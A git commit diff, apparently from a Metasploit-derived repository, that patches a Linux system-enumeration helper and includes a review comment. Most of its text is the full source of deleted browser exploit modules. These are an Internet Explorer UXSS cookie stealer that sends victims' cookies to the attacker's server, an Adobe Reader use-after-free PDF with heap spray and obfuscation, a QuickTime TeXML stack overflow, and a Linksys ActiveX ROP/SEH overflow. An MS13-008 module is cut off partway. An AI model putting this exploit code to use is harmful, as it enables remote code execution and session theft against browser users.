Add new functions and fix return bugs

cbrnrd 2018-04-11 10:47:21 -04:00
parent 57e243ac49
commit 1e34a6d3c6
21 changed files with 28 additions and 4434 deletions


@ -111,7 +111,7 @@ module System
services = {}
begin
full = cmd_exec('netstat -tulpn')
raise "You must be root to get listening ports" if full =~ /\(No info could be read/
raise "You must be root to get listening ports" if full.include? '(No info could be read'
lines = full.split("\n").size
cmd = "netstat -tulpn | tail -n #{lines - 2}"
full = cmd_exec(cmd)
@ -122,7 +122,7 @@ module System
full.split("\n").each do |p|
ports << p.split('/')[1]
end
ports
return ports
else
full.split("\n").each do |s|
split = s.split('/')
@ -167,9 +167,9 @@ module System
cpuinfo = orig.split("\n\n")[0]
# This is probably a more platform independent way to parse the results (compared to splitting and assigning preset indices to values)
cpuinfo.split("\n").each do |l|
info[:speed_mhz] = l.split(': ')[1].to_i if l =~ /cpu MHz/
info[:product] = l.split(': ')[1] if l =~ /model name/
info[:vendor] = l.split(': ')[1] if l =~ /vendor_id/
info[:speed_mhz] = l.split(': ')[1].to_i if l.include? 'cpu MHz'
info[:product] = l.split(': ')[1] if l.include? 'model name'
info[:vendor] = l.split(': ')[1] if l.include? 'vendor_id'
end
info[:cores] = orig.split("\n\n").size
info
@ -237,7 +237,7 @@ module System
pids = []
full = cmd_exec('ps aux').to_s
full.split("\n").each do |pid|
pids << pid.split(' ')[1].to_i if pid =~ /#{program}/
pids << pid.split(' ')[1].to_i if pid.include? program
end
pids
end
@ -249,7 +249,7 @@ module System
def noexec?(mount_path)
mount = cmd_exec('cat /proc/mounts').to_s
mount.lines.each do |l|
true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
return true if l =~ Regexp.new("#{mount_path} (.*)noexec(.*)")
end
false
rescue
@ -263,13 +263,33 @@ module System
def nosuid?(mount_path)
mount = cmd_exec('cat /proc/mounts').to_s
mount.lines.each do |l|
true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
return true if l =~ Regexp.new("#{mount_path} (.*)nosuid(.*)")
end
false
rescue
raise 'Unable to check for nosuid volume'
end
#
# Checks for protected hardlinks on the system
# @return [Boolean]
#
def protected_hardlinks?
read_file('/proc/sys/fs/protected_hardlinks').to_s.eql? '1'
rescue
raise 'Could not determine protected_hardlinks status'
end
#
# Checks for protected symlinks on the system
# @return [Boolean]
#
def protected_symlinks?
read_file('/proc/sys/fs/protected_symlinks').to_s.eql? '1'
rescue
raise 'Could not determine protected_symlinks status'
end
end # System
end # Linux
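Review bot: The new `protected_hardlinks?` and `protected_symlinks?` compare the raw file contents with `eql? '1'`, but values read from /proc/sys files end with a newline, so `read_file(...)` presumably yields `"1\n"` and both predicates would always return false; compare after trimming, `read_file('/proc/sys/fs/protected_hardlinks').to_s.strip == '1'` (and likewise for protected_symlinks). The bare `rescue` under each then re-raises a fixed string that discards the original exception's message, so a permission error is indistinguishable from a missing file; including `$!.message` in the raised text would keep that signal. In the `noexec?` and `nosuid?` hunks the added `return true` lines still interpolate `mount_path` unescaped into `Regexp.new`, so a path containing regex metacharacters is mis-matched or raises, and the `#{mount_path} (.*)` pattern also matches any longer mount point sharing the same suffix (checking `/tmp` would match a `/var/tmp` line); splitting each /proc/mounts line on whitespace, comparing the second field with `mount_path` and testing the fourth field's comma-separated options would be exact. The `noexec?` method's rescue clause continues past its hunk.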


@ -1,152 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
'Description' => %q{
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
you are behind NAT.
},
'License' => MSF_LICENSE,
'Author' =>
[
'David Leo', # Original discovery
'filedescriptor', # PoC
'joev', # He figured it out really
'sinn3r' # MSF
],
'References' =>
[
[ 'CVE', '2015-0072' ],
[ 'OSVDB', '117876' ],
[ 'MSB', 'MS15-018' ],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
],
'Platform' => 'win',
'DisclosureDate' => "Feb 1 2015"
))
register_options(
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
])
end
def setup
if target_uri !~ /^http/i
raise Msf::OptionValidateError.new(['TARGET_URI'])
end
super
end
def target_uri
datastore['TARGET_URI']
end
def get_html
@html ||= html
end
def ninja_cookie_stealer_name
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
end
def get_uri(cli=self.cli)
ssl = datastore["SSL"]
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
host = datastore['URIHOST']
elsif (cli and cli.peerhost)
host = Rex::Socket.source_address(cli.peerhost)
else
host = srvhost_addr
end
if Rex::Socket.is_ipv6?(host)
host = "[#{host}]"
end
if datastore['URIPORT']
port = ':' + datastore['URIPORT'].to_s
elsif (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
port = ''
else
port = ":" + datastore["SRVPORT"].to_s
end
uri = proto + host + port + get_resource
uri
end
def server_uri
@server_uri ||= get_uri
end
def js
datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
end
def html
%Q|
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
<script>
window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
</script>
|
end
def run
exploit
end
def extract_cookie(uri)
Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
end
def on_request_uri(cli, request)
case request.uri
when /redirect\.php/
print_status("Sending redirect")
send_redirect(cli, "#{datastore['TARGET_URI']}")
when /sleep\.php/
sleep(3)
send_response(cli, '')
when /#{ninja_cookie_stealer_name}/
data = extract_cookie(request.uri)
if data.blank?
print_status("The XSS worked, but no cookie")
else
print_status("Got cookie")
print_line(data)
report_note(
:host => cli.peerhost,
:type => 'ie.cookie',
:data => data
)
path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
vprint_good("Cookie stored as: #{path}")
end
else
print_status("Sending HTML")
send_response(cli, get_html)
end
end
end


@ -1,220 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Doc.media.newPlayer Use After Free Vulnerability',
'Description' => %q{
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat
Professional versions up to and including 9.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown', # Found in the wild
# Metasploit version by:
'hdm',
'pusscat',
'jduck',
'jabra'
],
'References' =>
[
[ 'CVE', '2009-4324' ],
[ 'BID', '37331' ],
[ 'OSVDB', '60980' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-02.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# test results (on Windows XP SP3)
# reader 6.0.1 - vulnerable / doesn't work
# reader 7.0.5 - untested
# reader 7.0.8 - untested
# reader 7.0.9 - vulnerable / doesn't work
# reader 7.1.0 - untested
# reader 7.1.1 - untested
# reader 8.0.0 - untested
# reader 8.1.1 - works
# reader 8.1.2 - untested
# reader 8.1.3 - untested
# reader 8.1.4 - untested
# reader 8.1.5 - untested
# reader 8.1.6 - untested
# reader 9.0.0 - untested
# reader 9.1.0 - works
# reader 9.2 - works (no debugger, no DEP)
[ 'Adobe Reader Windows English (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0c0c0c0c
}
],
[ 'Adobe Reader Windows German (JS Heap Spray)',
{
'Size' => (0x10000/2),
'Ret' => 0x0a0a0a0a
}
],
],
'DisclosureDate' => 'Dec 14 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Make some nops
nops = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize variables
#
len = 72
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
randnop = rand_text_alpha(rand(100) + 1)
vtbuf = [target.ret].pack('V') * 4
vtbuf << rand_text_alpha(len - vtbuf.length)
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
retstring = Rex::Text.to_unescape(vtbuf)
# The printd strings are 72 bytes (??)
script = %Q|
var #{randnop} = "#{nops}";
var #{rand1} = unescape("#{shellcode}");
var #{rand2} = unescape(#{randnop});
var #{rand3} = unescape("#{retstring}");
while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
#{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
memory=new Array();
for(i=0;i<0x2000;i++) { memory[i]= #{rand2} + #{rand1}; }
util.printd("#{rand4}", new Date());
util.printd("#{rand5}", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(#{rand3}, new Date());
|
# Create the pdf
pdf = make_pdf(script)
print_status("Sending #{self.name}")
send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })
handler(cli)
end
def random_non_ascii_string(count)
result = ""
count.times do
result << (rand(128) + 128).chr
end
result
end
def io_def(id)
"%d 0 obj" % id
end
def io_ref(id)
"%d 0 R" % id
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
def n_obfu(str)
result = ""
str.scan(/./u) do |c|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
result << "#%x" % c.unpack("C*")[0]
else
result << c
end
end
result
end
def ascii_hex_whitespace_encode(str)
result = ""
whitespace = ""
str.each_byte do |b|
result << whitespace << "%02x" % b
whitespace = " " * (rand(3) + 1)
end
result << ">"
end
def make_pdf(js)
xref = []
eol = "\x0d\x0a"
endobj = "endobj" << eol
pdf = "%PDF-1.5" << eol
pdf << "%" << random_non_ascii_string(4) << eol
xref << pdf.length
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
xref << pdf.length
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
xref << pdf.length
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
xref << pdf.length
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
xref << pdf.length
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
xref << pdf.length
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
pdf << "stream" << eol
pdf << compressed << eol
pdf << "endstream" << eol
pdf << endobj
xrefPosition = pdf.length
pdf << "xref" << eol
pdf << "0 %d" % (xref.length + 1) << eol
pdf << "0000000000 65535 f" << eol
xref.each do |index|
pdf << "%010d 00000 n" % index << eol
end
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
pdf << "startxref" << eol
pdf << xrefPosition.to_s() << eol
pdf << "%%EOF" << eol
end
end


@ -1,299 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Apple QuickTime. When handling
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
gain arbitrary code execution under the context of the user. This is due to the
QuickTime3GPP.gtx component not handling certain Style subfields properly, as the
font-table field, which is used to trigger the overflow in this module. Because of
QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be
used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module
has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
},
'Author' =>
[
'Arezou Hosseinzad-Amirkhizi', # Vulnerability Discovery
'juan vazquez' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '87087' ],
[ 'CVE', '2012-3752' ],
[ 'BID', '56557' ],
[ 'URL', 'http://support.apple.com/kb/HT5581' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 1000,
},
'Platform' => 'win',
'Targets' =>
[
# Tested with QuickTime 7.7.2
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', {} ],
[ 'Firefox 3.5 on Windows XP SP3', {} ],
[ 'Firefox 3.5.1 on Windows XP SP3', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Nov 07 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
])
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
browser_name = ""
if agent =~ /MSIE/
browser_version = agent.scan(/MSIE (\d)/).flatten[0] || ''
browser_name = "IE #{browser_version}"
elsif agent =~ /Firefox\/3.5$/
browser_name = "Firefox 3.5 "
elsif agent =~ /Firefox\/3.5.1$/
browser_name = "Firefox 3.5.1"
elsif agent =~ /Opera\/9/
browser_name = "Opera"
end
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
end
targets.each do |t|
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if no suitable target found
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
if request.uri =~ /\.3gp/
print_status("Sending exploit TEXML (target: #{my_target.name})")
my_payload = "1" * (1024*16)
texml = <<-eos
<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-texml"?>
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
language="eng" timeScale="600"
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
<sample duration="2400" keyframe="true">
<description format="tx3g" displayFlags="ScrollIn"
horizontalJustification="Left"
verticalJustification="Top"
backgroundColor="0%, 0%, 0%, 100%">
<defaultTextBox x="0" y="0" width="176" height="60"/>
<fontTable>
<font id="1" name="Times"/>
</fontTable>
<sharedStyles>
<style id="1">
{font-table: #{my_payload}}
{font-style:normal}
{font-weight: normal}
{font-size: 10}
{line-height: 100%}
{text-align: right}
{text-decoration: underline}
{color: 100%, 100%, 100%, 100%}
{backgroundcolor: 100%, 100%, 100%, 100%}
</style>
</sharedStyles>
</description>
<sampleData scrollDelay="200"
highlightColor="25%, 45%, 65%, 100%"
targetEncoding="utf8">
<textBox x="10" y="10" width="156" height="40"/>
<text styleID="1">What you need... Metasploit!</text>
<highlight startMarker="1" endMarker="2"/>
<blink startMarker="3" endMarker="4"/>
</sampleData>
</sample>
</text3GTrack>
eos
send_response(client, texml, { 'Content-Type' => "application/x-quicktime-texml" })
else
print_status("Sending initial HTML")
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
url << ":" + datastore['SRVPORT'].to_s
url << get_resource
fname = rand_text_alphanumeric(4)
#ARCH used by the victim machine
arch = Rex::Arch.endian(my_target.arch)
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
code = Rex::Text.to_unescape(payload.encoded, arch)
randnop = rand_text_alpha(rand(100) + 1)
# Spray puts payload on 0x31313131
if my_target.name =~ /IE/
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var #{randnop} = "#{nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, 0x800 - code.length);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=0; i < 1600; i++) {
heap_obj.alloc(block);
}
JS
#Use heaplib
js_spray = heaplib(spray)
#obfuscate on demand
if datastore['OBFUSCATE']
js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
js_spray.obfuscate(memory_sensitive: true)
end
else
js_spray = <<-JS
var shellcode = unescape("#{code}");
var #{randnop} = "#{nops}";
var bigblock = unescape(#{randnop});
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
JS
end
content = "<html>"
content << <<-JSPRAY
<head>
<script>
#{js_spray}
</script>
</head>
JSPRAY
content << "<body>"
content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{fname}.3gp">
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.3gp">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{fname}.3gp"
QTSRC = "#{url}/#{fname}.3gp"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
content << "</body></html>"
send_response(client, content, { 'Content-Type' => "text/html" })
end
end
end
=begin
* Routine checking only for '1'-'9' chars for the vaules on the vulnerable style fields (font-table, font-size and line-height)
int __fastcall sub_67EED2B0(int a1, int a2)
{
int result; // eax@1
unsigned __int8 v3; // cl@2
for ( result = 0; ; ++result )
{
v3 = *(_BYTE *)a2++ - 0x30;
if ( v3 > 9u )
break;
}
return result;
}
=end


@ -1,255 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh
#include Msf::Exploit::Remote::BrowserAutopwn
#
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "6.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}",
# :method => "SetSource",
# :rank => NormalRanking
#})
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco Linksys PlayerPT ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15
as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ
Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in
the SetSource method, allows to trigger a stack based buffer overflow which leads
to code execution under the context of the user visiting a malicious web page.
},
'Author' =>
[
'rgod', # Vuln discovery, PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '80297' ],
[ 'EDB', '18641' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x00\x0d\x0a\x5c",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
# Cisco Linksys PlayerPT ActiveX Control 1.0.0.15
[ 'Automatic', { } ],
[
'IE 6 on Windows XP SP3',
{
'Spray' => true,
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'OffsetStackBottom' => 8556
}
],
[
'IE 7 on Windows XP SP3 / Windows Vista SP2',
{
'Spray' => true,
'SprayBlocks' => 0x185,
'SprayOffset' => '0x0',
'OffsetStackBottom' => 3220
}
],
[
'IE 8 on Windows XP SP3',
{
'Spray' => false,
'OffsetRop' => 160,
'Offset' => 456,
'Ret' => 0x1002c536, # ADD ESP,0A2C # RETN from PlayerPT.ocx
'OffsetStackBottom' => 4108
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 22 2012',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end
def get_spray(t, js_code, js_nops)
randnop = rand_text_alpha(rand(100) + 1)
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{t['SprayOffset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var z=1; z < #{t['SprayBlocks']}; z++) {
heap_obj.alloc(block);
}
JS
return spray
end
# rop chain generated with mona.py
def create_rop_chain()
rop_gadgets =
[
0x77c2f271, # POP EBP # RETN [msvcrt.dll]
0x77c2f271, # skip 4 bytes [msvcrt.dll]
0x77c5335d, # POP EBX # RETN [msvcrt.dll]
0xffffffff, #
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
0x77c127e1, # INC EBX # RETN [msvcrt.dll]
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34de1, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c479e2, # POP EDI # RETN [msvcrt.dll]
0x77c39f92, # RETN (ROP NOP) [msvcrt.dll]
0x77c3b8ba, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c4e392, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c51025, # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
return rop_gadgets
end
def get_payload(my_target)
case my_target.name
when /IE 6 on Windows XP SP3/
my_payload = "\x0c" * my_target['OffsetStackBottom']
return my_payload
when /IE 7 on Windows XP SP3 \/ Windows Vista SP2/
my_payload = "\x0c" * my_target['OffsetStackBottom']
return my_payload
when /IE 8 on Windows XP SP3/
my_payload = rand_text_alpha(my_target['OffsetRop'])
my_payload << create_rop_chain
my_payload << make_nops(my_target['Offset'] - my_payload.length)
my_payload << generate_seh_record(my_target.ret)
my_payload << payload.encoded
my_payload << rand_text_alpha(my_target['OffsetStackBottom'] - my_payload.length)
return my_payload
end
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows XP SP3
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[2] #IE 7 on Windows Vista SP2
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("User-agent: #{agent}")
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have a setup we're targeting
if my_target.nil?
print_error("Browser not supported: #{agent}")
send_not_found(cli)
return
end
js = ""
if my_target['Spray']
p = payload.encoded
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
js = get_spray(my_target, js_code, js_nops)
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
end
sploit = get_payload(my_target)
sploit = sploit.gsub(/"/, "\\\"")
html = <<-MYHTML
<html>
<head>
<script>
#{js}
</script>
</head>
<body>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object>
<script>
obj.SetSource("","","","","#{sploit}");
</script>
</body>
</html>
MYHTML
html = html.gsub(/^ {4}/, '')
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end


@ -1,286 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({
# :ua_name => HttpClients::IE,
# :ua_minver => "8.0",
# :ua_maxver => "8.0",
# :javascript => true,
# :os_name => OperatingSystems::Match::WINDOWS,
# :rank => GoodRanking
#})
def initialize(info={})
super(update_info(info,
'Name' => "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CButton object is freed, but a reference
is kept and used again during a page reload, an invalid memory that's controllable
is used, and allows arbitrary code execution under the context of the user.
Please note: This vulnerability has been exploited in the wild targeting
mainly China/Taiwan/and US-based computers.
},
'License' => MSF_LICENSE,
'Author' =>
[
'eromang',
'mahmud ab rahman',
'juan vazquez', #Metasploit
'sinn3r', #Metasploit
'Peter Vreugdenhil' #New trigger & new exploit technique
],
'References' =>
[
[ 'CVE', '2012-4792' ],
[ 'OSVDB', '88774' ],
[ 'US-CERT-VU', '154201' ],
[ 'BID', '57070' ],
[ 'MSB', 'MS13-008' ],
[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],
[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
